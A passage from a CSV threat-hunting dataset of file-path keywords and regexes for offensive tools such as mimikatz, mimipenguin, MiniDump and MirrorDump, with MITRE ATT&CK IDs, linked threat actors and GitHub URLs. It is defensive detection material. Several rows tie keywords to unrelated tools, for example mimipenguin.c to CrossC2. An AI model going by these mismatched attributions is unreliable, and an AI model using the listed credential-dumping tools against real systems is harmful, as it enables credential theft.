Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8834"
"*/mimikatz_bypassAV/mimikatz_load.exe*",".{0,1000}\/mimikatz_bypassAV\/mimikatz_load\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8835"
"*/mimikatz_load.exe*",".{0,1000}\/mimikatz_load\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8836"
"*/mimilib.def*",".{0,1000}\/mimilib\.def.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8837"
"*/mimilib.dll*",".{0,1000}\/mimilib\.dll.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","8838"
"*/mimilove.c*",".{0,1000}\/mimilove\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8839"
"*/mimilove.h*",".{0,1000}\/mimilove\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8840"
"*/mimilove.rc*",".{0,1000}\/mimilove\.rc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8841"
"*/mimipenguin.*",".{0,1000}\/mimipenguin\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8842"
"*/mimipenguin.c*",".{0,1000}\/mimipenguin\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","8843"
"*/mimipenguin.md*",".{0,1000}\/mimipenguin\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8844"
"*/mimipenguin.sh*",".{0,1000}\/mimipenguin\.sh.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","1","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","8845"
"*/mimipenguin/*",".{0,1000}\/mimipenguin\/.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","8846"
"*/mimipenguin/*",".{0,1000}\/mimipenguin\/.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","8847"
"*/mimipenguin/releases/download/*",".{0,1000}\/mimipenguin\/releases\/download\/.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","#linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","8848"
"*/mimipy.git*",".{0,1000}\/mimipy\.git.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","1","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","8849"
"*/mimipy.py*",".{0,1000}\/mimipy\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8850"
"*/mimishim/*",".{0,1000}\/mimishim\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8851"
"*/MiniDump.git*",".{0,1000}\/MiniDump\.git.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","8852"
"*/minidump.go*",".{0,1000}\/minidump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","8853"
"*/minidump.zip*",".{0,1000}\/minidump\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","8854"
"*/MiniDump-main.zip*",".{0,1000}\/MiniDump\-main\.zip.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","8855"
"*/minidump-rs.exe*",".{0,1000}\/minidump\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","8856"
"*/minimal_elf.h*",".{0,1000}\/minimal_elf\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","8857"
"*/Minimalistic-offensive-security-tools.git*",".{0,1000}\/Minimalistic\-offensive\-security\-tools\.git.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","8858"
"*/mirai_pass.txt*",".{0,1000}\/mirai_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8859"
"*/MirrorDump.exe*",".{0,1000}\/MirrorDump\.exe.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","8860"
"*/MirrorDump.git*",".{0,1000}\/MirrorDump\.git.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","8861"
"*/Misc/donut.exe*",".{0,1000}\/Misc\/donut\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","1","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","8862"
"*/MiTM.java*",".{0,1000}\/MiTM\.java.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","1","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","8863"
"*/mitmAP*",".{0,1000}\/mitmAP.{0,1000}","offensive_tool_keyword","mitmAP","A python program to create a fake AP and sniff data","T1563 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/xdavidhu/mitmAP","1","1","N/A","N/A","10","10","1668","265","2019-11-03T11:34:06Z","2016-10-22T21:49:25Z","8864"
"*/MITMRecorder.py*",".{0,1000}\/MITMRecorder\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","8866"
"*/mkzoneslices.sh*",".{0,1000}\/mkzoneslices\.sh.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","1","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","8868"
